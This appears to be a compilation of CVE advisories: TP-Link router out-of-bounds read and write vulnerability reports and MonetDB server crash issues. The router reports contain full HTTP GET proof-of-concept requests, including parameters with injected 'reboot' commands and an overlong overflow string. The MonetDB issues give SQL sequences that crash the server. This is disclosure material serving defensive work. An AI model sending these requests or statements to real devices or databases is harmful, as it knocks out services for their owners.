Fortra Globalscape EFT's administration server suffers from an information disclosure vulnerability where the serial number of the harddrive that Globalscape is installed on can be remotely determined via a "trial extension request" message


CVE-2023-2991: Multiple Vulnerabilities in Fortra Globalscape EFT Administration Server [FIXED]

TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8, TL-WR941ND V5, and TL-WR740N V1/V2 were discovered to contain a buffer read out-of-bounds via the component /userRpm/VirtualServerRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR941ND/TL-WR940N/TL-WR841N/TL-WR740N wireless router /userRpm/VirtualServerRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer read out-of-bounds vulnerability exists in TP-Link TL-WR940N V2/V4/v6、TL-WR841N V8、TL-WR941ND V5 and TL-WR740N V1/V2 wireless router. Its /userRpm/VirtualServerRpm component has a security vulnerability in processing Changed GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V2/V4/V6、TL-WR841N V8、TL-WR941ND V5、TP-Link TL-WR740N V1/V2

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    *   V3.1：8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link WR940N V4 is as follows:

GET /ZTWUDCYBHABTCTJB/userRpm/VirtualServerRpm.htm?ExPort=22&InPort=20&Ip=192.168.3.1&Protocol=1&State=1&Commonport=0&Changed|reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/ZTWUDCYBHABTCTJB/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR940N V2 is as follows:

GET /EWNCMWMAFSHJQWBA/userRpm/VirtualServerRpm.htm?ExPort=21&InPort=21&Ip=192.168.0.2&Protocol=2&State=1&Commonport=2&Changed;=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR940N V6 is as follows:

GET /EWNCMWMAFSHJQWBA/userRpm/VirtualServerRpm.htm?ExPort=21&InPort=21&Ip=192.168.0.2&Protocol=2&State=1&Commonport=2&Changed;=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR941ND V5 is as follows:

GET /MZKBGETBOHFWYCNC/userRpm/VirtualServerRpm.htm?ExPort=53&InPort=53&Ip=192.168.1.2&Protocol=1&State=0&Commonport=1&&&reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/YOKQCLEBKGHAVJDB/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR841N V8 is as follows:

GET /userRpm/VirtualServerRpm.htm?ExPort=45&InPort=34&Ip=192.168.0.5&Protocol=1&State=1&Commonport=0&ChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChangedChanged=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49168
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49168/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR740N is as follows:

GET /userRpm/VirtualServerRpm.htm?Port=53&Ip=192.168.0.2&Protocol=1&State=1&Commonport=1&;${reboot};=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://192.168.1.1/userRpm/VirtualServerRpm.htm?Add=Add&Page=1
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/VirtualServerRpm component has a security vulnerability in processing the Changed GET key parameter. The Changed parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits this vulnerability to cause a buffer out-of-bounds read error, which may lead to the disclosure of memory-sensitive information and denial of service. Attackers can directly achieve the effect of denial of service by exploiting this vulnerability.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, the cache area read out of bounds and a BadVA error occurred, resulting in denial of service.

**5\. The basis for judging as a 0-day vulnerability**

Searching the VirtualServerRpm keyword in the NVD database did not find any vulnerabilities; searching the firmware model + parameter Changed keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE-2023-36356: iotvul/tp-link/4/TL-WR941ND_TL-WR940N_TL-WR740N_userRpm_VirtualServerRpm.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR740N V1/V2, TL-WR940N V2/V3, and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlTimeSchedRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N/TL-WR841N/TL-WR740N/TL-WR941ND wireless router /userRpm/AccessCtrlTimeSchedRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer read out-of-bounds vulnerability exists in TP-Link TL-WR940N V4、TP-Link TL-WR841N V8/V10、 TP-Link TL-WR740N V1/V2、TP-Link TL-WR940N V2/V3 and TP-Link TL-WR941ND V5/V6 wireless router. Its /userRpm/AccessCtrlTimeSchedRpm component has a security vulnerability in processing Changed GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4、TP-Link TL-WR841N V8/V10、TP-Link TL-WR740N V1/V2、TP-Link TL-WR940N V2/V3、TP-Link TL-WR941ND V5/V6

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    *   V3.1：8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link TL-WR940N is as follows:

GET /ZYROEMCBUFENISDA/userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=test&day\_type=1&all\_hours=on&||reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/ZYROEMCBUFENISDA/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V10 is as follows:

GET /RODYEYNAKQNKXJXB/userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=test&day\_type=1&all\_hours=on&Changed|CMD=$"reboot";$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/RODYEYNAKQNKXJXB/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR740N is as follows:

GET /userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=WE&day\_type=1&all\_hours=on&||reboot=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://192.168.1.1/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:

GET /MZKBGETBOHFWYCNC/userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=1&day\_type=1&all\_hours=on&ChangedCMD=$"reboot";$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:

GET /IOCGBYQCJARLTZQC/userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=1&day\_type=1&all\_hours=on&&CMD=$'reboot';$CMD=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V8 is as follows:

GET /userRpm/AccessCtrlTimeSchedRpm.htm?time\_sched\_name=3raw4r&day\_type=1&all\_hours=on&||reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49169
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://0.0.0.0:49169/userRpm/AccessCtrlTimeSchedRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/AccessCtrlTimeSchedRpm component has a security vulnerability in processing the Changed GET key parameter. The Changed parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits the Changed parameter of this vulnerability to cause a buffer out-of-bounds read error, which may lead to memory-sensitive information disclosure and denial of service. Attackers can directly achieve the effect of denial of service by exploiting this vulnerability.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, the cache area read out of bounds and a BadVA error occurred, resulting in denial of service.

**5\. The basis for judging as a 0-day vulnerability**

Searching the AccessCtrlTimeSchedRpm keyword in the NVD database did not find any vulnerabilities; searching the firmware model + parameter Changed keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE-2023-36354: iotvul/tp-link/7/TL-WR940N_TL-WR841N_TL-WR740N_TL-WR941ND_userRpm_AccessCtrlTimeSchedRpm.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N V4 was discovered to contain a buffer overflow via the ipStart parameter at /userRpm/WanDynamicIpV6CfgRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N wireless router /userRpm/WanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer write out-of-bounds
*   Vulnerability Description: A buffer write-out vulnerability exists in TP-Link TL-WR940N wireless router, firmware version V4. Its /userRpm/WanDynamicIpV6CfgRpm implementation has a security vulnerability in handling the ipStart GET key parameter, allowing remote attackers to submit special requests that can cause buffer out-of-bounds write errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service
    *   Remote Code Execution(RCE)

**3 PoC**

The PoC of TP-Link TL-WR940N is as follows:

GET /RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm?ipv6Enable=on&wantype=2&ipType=2&mtu=1480&dnsType=0&ipAssignType=0&ipStart=1000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ipEnd=2000&time=86400&ipPrefixType=0&staticPrefix=&staticPrefixLength=64&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/RKIMKONAENVJOZYB/userRpm/WanDynamicIpV6CfgRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/WanDynamicIpV6CfgRpm component implements a security vulnerability in processing the ipStart GET key parameter. The length of the parameter key of ipStart can be any length and it is put into the stack without any boundary check, resulting in a write out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.

The firmware is simulated by means of simulation, the simulation process and interface are as follows:

After sending the PoC, the ipStart parameter value is too long, which leads to the write out of bounds, causing a fatal memory error, and a BadVA error, which leads to the service crash.

**5\. The basis for judging as a 0-day vulnerability**

Search the WanDynamicIpV6CfgRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

Search the WanDynamicIpV6CfgRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

CVE-2023-36355: iotvul/tp-link/9/TP-Link TL-WR940N wireless router userRpmWanDynamicIpV6CfgRpm buffer write out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul

An issue in the list_append component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes at list_append after executing SQL statements through mclient.

**To Reproduce**

create table t1(c1 int auto\_increment primary key NOT NULL);
create trigger i1 after insert on t1 for each row insert into t1 values(NULL);
insert into t1 values(NULL);

**Expected behavior**  
This crash is strange. From the backtrace as follows, we can know that the crash is caused by infinite recursion.

However, if we change the first statement into create table t1(c1 int);, the MonetDB will return the message Query too complex: running out of stack space when executing the third stmt. So, MonetDB handles out of stack space, but it does not work with some special table definitions?

What's more, the definition of the table contains the NOT NULL constraint, which should fail the third stmt. If we remove the create trigger statement, MonetDB will return the message INSERT INTO: NOT NULL constraint violated for column t1.c1 when executing the insert stmt. But with the create trigger stmt, it crashes instead.

Anyway, I think the expected behavior is to return the error message Query too complex: running out of stack space or INSERT INTO: NOT NULL constraint violated for column t1.c1, instead of crashing straightly.

**Backtrace**

    #0 0x7f0c3760dbda (list_append+0x1a)
    #1 0x7f0c376669c6 (rel_insert+0x196)
    #2 0x7f0c3766abb3 (rel_updates+0x1ce3)
    #3 0x7f0c376c6c11 (sequential_block+0x121)
    #4 0x7f0c376c52dc (rel_psm+0x131c)
    #5 0x7f0c37653091 (rel_semantic+0x91)
    #6 0x7f0c37652e6a (rel_parse+0x19a)
    #7 0x7f0c37563102 (sql_insert_triggers+0x232)
    #8 0x7f0c3755bb5e (rel2bin_insert+0x148e)
    #9 0x7f0c37554539 (subrel_bin+0xd69)
    #10 0x7f0c3755f218 (exp_bin+0x29e8)
    #11 0x7f0c37558567 (subrel_bin+0x4d97)
    #12 0x7f0c37563162 (sql_insert_triggers+0x292)
    #13 0x7f0c3755bb5e (rel2bin_insert+0x148e)
    #14 0x7f0c37554539 (subrel_bin+0xd69)
    #15 0x7f0c3755f218 (exp_bin+0x29e8)
    #16 0x7f0c37558567 (subrel_bin+0x4d97)
    #17 0x7f0c37563162 (sql_insert_triggers+0x292)
    ...
    #7407 0x7f0c37563162 (sql_insert_triggers+0x292)
    #7408 0x7f0c3755bb5e (rel2bin_insert+0x148e)
    #7409 0x7f0c37554539 (subrel_bin+0xd69)
    #7410 0x7f0c3755373b (output_rel_bin+0x6b)
    #7411 0x7f0c3757f9d9 (backend_dumpstmt+0x199)
    #7412 0x7f0c3754a367 (SQLparser+0x5d7)
    #7413 0x7f0c3754987b (SQLengine_+0x59b)
    #7414 0x7f0c37548343 (SQLengine+0x23)
    #7415 0x7f0c378d76cf (runScenario+0x4f)
    #7416 0x7f0c378d816c (MSscheduleClient+0x68c)
    #7417 0x7f0c3797fc2b (doChallenge+0xfb)
    #7418 0x7f0c37ffeba0 (THRstarter+0x100)
    #7419 0x7f0c3806ecc4 (thread_starter+0x34)
    #7420 0x7f0c373e3609 (start_thread+0xd9)
    #7421 0x7f0c37308133 (clone+0x43)
    

**Software versions**

*   MonetDB server version: 11.46.0 (hg id: 63a42c2) (pulled from the master branch)
*   MonetDB client version: mclient, version 11.48.0 (hg id: 63a42c2)
*   OS and version: ubuntu 20.04
*   Self-installed and compiled. The command line of compilation: CC=clang-12 CXX=clang++-12 cmake /root/monetdb_master -DCMAKE_BUILD_TYPE=RelWithDebInfo

**Issue labeling**  
bug

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36369: MonetDB server 11.46.0 crashes at `list_append` · Issue #7383 · MonetDB/MonetDB

An issue in the cs_bind_ubat component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server crashes at cs_bind_ubat after executing SQL statements through ODBC.

**To Reproduce**

CREATE TABLE t2 (c1 int, t1 int, c2 int);
INSERT INTO t2 VALUES(127,255,1),(127,1,2),(\-128,0,3),(\-128,2,4),(\-1,NULL,5);
INSERT INTO t2 VALUES(200,126,1),(250,\-127,2);
INSERT INTO t2 VALUES (\-128,0,1),(\-1,1,1),(\-2,2,2),(\-3,3,3),(\-4,4,4),(\-5,5,5),(\-6,6,6),(0,0,7),(1,1,8),(2,NULL,9),(3,NULL,10),(127,255,11);
DELETE FROM t2 WHERE c1 IN (\-2, 0);
START TRANSACTION;
UPDATE t2 SET c2 \= c2 + 100;
UPDATE t2 SET c2 \= c2 + 100;

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

**Backtrace**

    #0 0x7f6388374871 (cs_bind_ubat+0x151)
    #1 0x7f6388373483 (bind_ubat+0x43)
    #2 0x7f638836d860 (bind_updates+0xe0)
    #3 0x7f63882854ce (mvc_bind_wrap+0x28e)
    #4 0x7f6388614c63 (runMALsequence+0x763)
    #5 0x7f63886185d4 (DFLOWworker+0x2c4)
    #6 0x7f6388d4fba0 (THRstarter+0x100)
    #7 0x7f6388dbfcc4 (thread_starter+0x34)
    #8 0x7f6388134609 (start_thread+0xd9)
    #9 0x7f6388059133 (clone+0x43)
    

**Software versions**

*   MonetDB server version: 11.46.0 (hg id: 63a42c2) (pulled from the master branch)
*   MonetDB ODBC version: 11.46.0
*   OS and version: ubuntu 20.04
*   Self-installed and compiled. The command line of compilation: CC=clang-12 CXX=clang++-12 cmake /root/monetdb_master -DCMAKE_BUILD_TYPE=RelWithDebInfo

\*\*Issue labeling \*\*  
bug

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36368: MonetDB server 11.46.0 crashes at cs_bind_ubat · Issue #7379 · MonetDB/MonetDB

An issue in the BLOBcmp component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes at BLOBcmp after executing SQL statements through mclient.

CREATE TABLE a (p\_id INT, p\_name BLOB);
INSERT INTO a VALUES (1,NULL);
TRACE select \* from a where p\_name\='Lilu';

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7f2b15259d39 (BLOBcmp+0x19)
    #1 0x7f2b14b2a171 (prepareMalEvent+0x541)
    #2 0x7f2b14b2b10f (sqlProfilerEvent+0x6f)
    #3 0x7f2b14b152ec (runtimeProfileExit+0x11c)
    #4 0x7f2b14b1ab01 (runMALsequence+0x1601)
    #5 0x7f2b14b1d5d4 (DFLOWworker+0x2c4)
    #6 0x7f2b15254ba0 (THRstarter+0x100)
    #7 0x7f2b152c4cc4 (thread_starter+0x34)
    #8 0x7f2b14639609 (start_thread+0xd9)
    #9 0x7f2b1455e133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36367: MonetDB server 11.46.0 crashes at `BLOBcmp` · Issue #7380 · MonetDB/MonetDB

An issue in the log_create_delta component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server 11.46.0 crashes at log_create_delta after executing SQL statements through mclient.

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

    #0 0x7f19dc711703 (log_create_delta+0x23)
    #1 0x7f19dc7116bd (log_create_col+0x1d)
    #2 0x7f19dc6e088e (sql_trans_commit+0x36e)
    #3 0x7f19dc6eb353 (sql_trans_end+0x83)
    #4 0x7f19dc72e10c (mvc_commit+0x4fc)
    #5 0x7f19dc65532c (SQLtransaction_commit+0x9c)
    #6 0x7f19dc9a9c63 (runMALsequence+0x763)
    #7 0x7f19dc9a931e (runMAL+0x9e)
    #8 0x7f19dc6309f9 (SQLrun+0xd9)
    #9 0x7f19dc631bee (SQLengineIntern+0x4e)
    #10 0x7f19dc62f8c2 (SQLengine_+0x5e2)
    #11 0x7f19dc62e343 (SQLengine+0x23)
    #12 0x7f19dc9bd6cf (runScenario+0x4f)
    #13 0x7f19dc9be16c (MSscheduleClient+0x68c)
    #14 0x7f19dca65c2b (doChallenge+0xfb)
    #15 0x7f19dd0e4ba0 (THRstarter+0x100)
    #16 0x7f19dd154cc4 (thread_starter+0x34)
    #17 0x7f19dc4c9609 (start_thread+0xd9)
    #18 0x7f19dc3ee133 (clone+0x43)
    

**Additional context**  
The MonetDB here runs in-memory database. The command line of starting MonetDB server is mserver5 --in-memory.

CVE-2023-36366: MonetDB server 11.46.0 crashes at `log_create_delta` · Issue #7381 · MonetDB/MonetDB

An issue in the sql_trans_copy_key component of MonetDB Server v11.45.17 and v11.46.0 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

**Describe the bug**  
MonetDB server crashes at sql\_trans\_copy\_key after executing SQL statements through ODBC.

**Expected behavior**  
Executing statements successfully or throwing errors, instead of breaking down the whole MonetDB server.

